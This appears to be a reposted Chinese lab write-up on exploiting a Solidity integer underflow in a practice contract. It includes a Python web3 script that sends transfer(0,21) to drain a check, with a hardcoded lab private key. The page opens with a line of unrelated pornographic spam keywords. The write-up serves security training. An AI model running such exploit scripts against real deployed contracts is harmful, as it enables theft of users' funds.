国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄

這篇具有很好參考價(jià)值的文章主要介紹了某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

區(qū)塊鏈安全

`


整數(shù)溢出漏洞實(shí)戰(zhàn)

實(shí)驗(yàn)?zāi)康?/h3>

學(xué)會(huì)使用python3的web3模塊
學(xué)會(huì)以太坊整數(shù)溢出漏洞分析及利用

實(shí)驗(yàn)環(huán)境

Ubuntu18.04操作機(jī)

實(shí)驗(yàn)工具

python3

實(shí)驗(yàn)原理

低版本Solidity整數(shù)是uint無符號(hào)類型,若操作存在不安全行為,可能會(huì)產(chǎn)生溢出,通過分析代碼找到漏洞點(diǎn),實(shí)現(xiàn)整數(shù)溢出利用。
題目環(huán)境是測試鏈,所以需要本地與題目進(jìn)行交互,可使用python3中的web3模塊,通過web3模塊的rpc功能與題目交互,從而編寫自動(dòng)化利用腳本。
實(shí)驗(yàn)內(nèi)容
使用python3編寫腳本測試漏洞
找到整數(shù)溢出漏洞并形成利用獲取flag
實(shí)驗(yàn)地址為nc ip 10001

攻擊過程

nc 靶標(biāo)ip 端口
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)
打開http://ip,輸入上述分配的game account,點(diǎn)擊Request獲取eth

某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)

nc ip 10001連接到題目,輸入2,獲取部署合約的地址及new token
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)

nc ip 10001連接到題目,輸入4,獲取合約源代碼,或者在題目附件找到合約源代碼
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)

分析合約源代碼漏洞

題目要求把flag設(shè)置為true,分析合約代碼,在transfer中可以將flag設(shè)置為true,但需要滿足totalSupply - _value > 0,其中totalSupply=20,其實(shí)考點(diǎn)為Solidity智能合約整數(shù)溢出,totalSupply與value都是uint無符號(hào)整數(shù),所以只需要value為21即可產(chǎn)生整數(shù)下溢,造成溢出
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)
需要調(diào)用transfer(0,21)即可將flag設(shè)置為true

EXP利用

利用python3的web3模塊與遠(yuǎn)程題目交互,并編寫利用代碼,將ip替換成題目的ip,contract_address替換成自己的地址

from web3 import Web3, HTTPProvider
import time

w3 = Web3(Web3.HTTPProvider('http://192.168.2.102:8545'))

contract_address = "0x68A04806e380BAa6D6f2E96027Cc0ed11c17FEf1"
private = "92b562f4dcb430f547401f31b5d1074e6791ec37786f449497c4f9563abef3fb"
public = "0x75e65F3C1BB334ab927168Bd49F5C44fbB4D480f"

def generate_tx(chainID, to, data, value):
    txn = {
        'chainId': chainID,
        'from': Web3.toChecksumAddress(public),
        'to': to,
        'gasPrice': w3.eth.gasPrice,
        'gas': 3000000,
        'nonce': w3.eth.getTransactionCount(Web3.toChecksumAddress(public)),
        'value': Web3.toWei(value, 'ether'),
        'data': data,
    }
    return txn

def sign_and_send(txn):
    signed_txn = w3.eth.account.signTransaction(txn, private)
    txn_hash = w3.eth.sendRawTransaction(signed_txn.rawTransaction).hex()
    txn_receipt = w3.eth.waitForTransactionReceipt(txn_hash)
    print("txn_hash=", txn_hash)
    return txn_receipt

# transfer(0,21)
data = Web3.keccak(text='transfer(address,uint256)').hex()[:10]
data += '0'*64
data += '21'.rjust(64,'0')

txn = generate_tx(8888, Web3.toChecksumAddress(contract_address), data, 0)
Hack = sign_and_send(txn)
print(Hack)

運(yùn)行exp
某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)

某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)

nc ip 10001連接到題目,輸入3,輸入之前的new token,獲取flag

某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄,區(qū)塊鏈,安全,學(xué)習(xí)文章來源地址http://www.zghlxwxcb.cn/news/detail-768510.html

到了這里,關(guān)于某60區(qū)塊鏈安全之整數(shù)溢出漏洞實(shí)戰(zhàn)學(xué)習(xí)記錄的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 某60區(qū)塊鏈安全之Create2實(shí)戰(zhàn)一學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之Create2實(shí)戰(zhàn)一學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約Create2引發(fā)的漏洞及其利用 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 君士坦丁堡硬升級(jí)中引入了一個(gè)新操作碼 CREATE2 ,它使用新的方式來計(jì)算常見的合約地址,讓生成的合約地址更具有可控性 在 CREATE2 以前,

    2024年02月05日
    瀏覽(21)
  • 某60區(qū)塊鏈安全之Create2實(shí)戰(zhàn)二學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之Create2實(shí)戰(zhàn)二學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約中的偽隨機(jī)數(shù)問題 學(xué)會(huì)利用Create2可在同一地址部署不同合約特性解決偽隨機(jī)數(shù)問題 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 君士坦丁堡硬升級(jí)中引入了一個(gè)新操作碼 CREATE2 ,它使用新的方式來計(jì)算常見的合約

    2024年02月03日
    瀏覽(25)
  • 某60區(qū)塊鏈安全之薅羊毛攻擊實(shí)戰(zhàn)一學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之薅羊毛攻擊實(shí)戰(zhàn)一學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約薅羊毛攻擊漏洞 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 薅羊毛攻擊指使用多個(gè)不同的新賬戶來調(diào)用空投函數(shù)獲得空投幣并轉(zhuǎn)賬至攻擊者賬戶以達(dá)到財(cái)富累計(jì)的一種攻擊方式。這類攻擊方式較為普通且常見,只

    2024年02月04日
    瀏覽(16)
  • 某60區(qū)塊鏈安全之未初始化的存儲(chǔ)指針實(shí)戰(zhàn)一學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之未初始化的存儲(chǔ)指針實(shí)戰(zhàn)一學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約未初始化的存儲(chǔ)指針漏洞 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 在solidity語言中,像動(dòng)態(tài)的數(shù)組、struct、mapping這樣的復(fù)雜數(shù)據(jù)結(jié)構(gòu)是不能直接在”?!崩锩姹4娴模?yàn)椤睏!崩镏荒鼙4鎲为?dú)的”字”,也就

    2024年02月03日
    瀏覽(20)
  • 某60區(qū)塊鏈安全之未初始化的存儲(chǔ)指針實(shí)戰(zhàn)二學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之未初始化的存儲(chǔ)指針實(shí)戰(zhàn)二學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約未初始化的存儲(chǔ)指針漏洞 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 在solidity語言中,像動(dòng)態(tài)的數(shù)組、struct、mapping這樣的復(fù)雜數(shù)據(jù)結(jié)構(gòu)是不能直接在”?!崩锩姹4娴模?yàn)椤睏!崩镏荒鼙4鎲为?dú)的”字”,也就

    2024年02月05日
    瀏覽(23)
  • 某60區(qū)塊鏈安全之Storage任意地址寫實(shí)戰(zhàn)學(xué)習(xí)記錄

    某60區(qū)塊鏈安全之Storage任意地址寫實(shí)戰(zhàn)學(xué)習(xí)記錄

    學(xué)會(huì)使用python3的web3模塊 學(xué)會(huì)分析以太坊智能合約中的Storage變量存儲(chǔ)問題 找到合約漏洞進(jìn)行分析并形成利用 Ubuntu18.04操作機(jī) python3 EVM 中,有三個(gè)地方可以存儲(chǔ)變量,分別是 Memory、Stack 和 Storage。Memory 和 Stack 是在執(zhí)行期間臨時(shí)生成的存儲(chǔ)空間,主要負(fù)責(zé)運(yùn)行時(shí)的數(shù)據(jù)存儲(chǔ),

    2024年02月05日
    瀏覽(18)
  • 某60物聯(lián)網(wǎng)安全之IoT漏洞利用實(shí)操1學(xué)習(xí)記錄

    某60物聯(lián)網(wǎng)安全之IoT漏洞利用實(shí)操1學(xué)習(xí)記錄

    學(xué)會(huì)使用fat模擬IoT設(shè)備固件 學(xué)會(huì)使用IDA分析設(shè)備固件內(nèi)服務(wù)程序的邏輯漏洞 學(xué)會(huì)使用pwntools與IoT設(shè)備服務(wù)交互并觸發(fā)漏洞 操作機(jī):Ubuntu 20.04【用戶名:user 密碼:user】 qemu fat binwalk pwntools IDA pro IoT 設(shè)備中可能存在各種漏洞,總結(jié)來說,這些漏洞可以被大體劃分為兩大類,一

    2024年02月22日
    瀏覽(27)
  • 內(nèi)網(wǎng)安全—Windows系統(tǒng)內(nèi)核溢出漏洞提權(quán)

    內(nèi)網(wǎng)安全—Windows系統(tǒng)內(nèi)核溢出漏洞提權(quán)

    系統(tǒng)內(nèi)核溢出漏洞提權(quán) ????????往緩沖區(qū)中寫入超出限定長度的內(nèi)容,造成緩沖區(qū)溢出,從而破壞程序的堆棧進(jìn)而運(yùn)行自己精心準(zhǔn)備的指定代碼,達(dá)到攻擊的目的。 分類: ????????堆溢出 ????????棧溢出 查找補(bǔ)丁的方法 ?????? ??1、手工查找補(bǔ)丁情況 ?????

    2024年02月03日
    瀏覽(28)
  • 踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析復(fù)現(xiàn)

    在進(jìn)行IOT安全領(lǐng)域的學(xué)習(xí)和實(shí)踐中,經(jīng)典漏洞的復(fù)現(xiàn)是必不可少的一環(huán)。本文將介紹一個(gè)經(jīng)典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及對(duì)DIR-815路由器中多次溢出漏洞的復(fù)現(xiàn)過程。 固件下載地址:https://legacyfiles.us.dlink.com/DIR-815/REVA/FIRMWARE/ 這個(gè)漏洞屬于經(jīng)典

    2024年03月26日
    瀏覽(20)
  • Moonbeam團(tuán)隊(duì)發(fā)布針對(duì)整數(shù)截?cái)嗦┒吹木o急安全修復(fù)

    2022年6月27日,Moonriver和Moonbeam都通過Runtime 1606進(jìn)行了緊急升級(jí),成功解決當(dāng)天早上(美國東部時(shí)間)由獨(dú)立白帽黑客披露的一項(xiàng)安全問題。該安全問題現(xiàn)已修復(fù),且不再被任一網(wǎng)絡(luò)利用。初步跡象表明,該漏洞從未被利用,但團(tuán)隊(duì)仍將繼續(xù)展開調(diào)查。 為了防止漏洞被惡意利用

    2023年04月17日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包